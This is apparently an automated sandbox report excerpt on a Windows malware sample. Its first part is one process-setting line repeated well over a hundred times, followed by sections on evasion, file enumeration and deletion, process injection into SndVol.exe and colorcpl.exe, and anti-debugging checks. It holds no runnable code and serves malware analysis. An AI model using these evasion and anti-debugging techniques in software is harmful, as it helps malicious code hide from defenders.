Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913F7E2 Sleep,ExitProcess, 8_2_2913F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040F7E2 Sleep,ExitProcess, 15_2_0040F7E2
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077E04FF Sleep,ExitProcess, 15_2_077E04FF
Source: C:\Windows\SysWOW64\SndVol.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 8_2_2914A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 15_2_0041A7D9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle, 15_2_077EB4F6
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 1038 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe Window / User API: threadDelayed 8953 Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe API coverage: 9.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe API coverage: 3.4 %
Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768 Thread sleep time: -3114000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe TID: 7768 Thread sleep time: -26859000s >= -30000s Jump to behavior
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02C55908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_29138847
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29137877 FindFirstFileW,FindNextFileW, 8_2_29137877
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2917E8F9 FindFirstFileExA, 8_2_2917E8F9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_2913BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_29149B86
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_2913BD72
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_2914C322
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_2913C388
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_2913928E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_291396A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_0040928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_0041C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_0040C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_004096A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_00408847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00407877 FindFirstFileW,FindNextFileW, 15_2_00407877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0044E8F9 FindFirstFileExA, 15_2_0044E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00419B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0781F616 FindFirstFileExA, 15_2_0781F616
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_077D9564
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D8594 FindFirstFileW,FindNextFileW, 15_2_077D8594
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_077DA3BD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_077ED03F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_077DD0A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_077D9FAB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_077DCA8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077EA8A3 FindFirstFileW, 15_2_077EA8A3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_077DC888
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_29137CD2
Source: SndVol.exe, 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000008.00000003.1574996217.00000000025DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: jlPBMMQbXC.exe, 00000000.00000002.1575706420.000000000077E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1575706420.00000000007CB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Selebzih.PIF, 0000000A.00000002.1688459414.0000000000753000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllsj
Source: Selebzih.PIF, 0000000D.00000002.1793508839.000000000066A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\SndVol.exe API call chain: ExitProcess graph end node
Source: C:\Users\Public\Libraries\Selebzih.PIF API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6F744 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent, 0_2_02C6F744
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process queried: DebugPort Jump to behavior
Source: C:\Users\Public\Libraries\Selebzih.PIF Process queried: DebugPort Jump to behavior
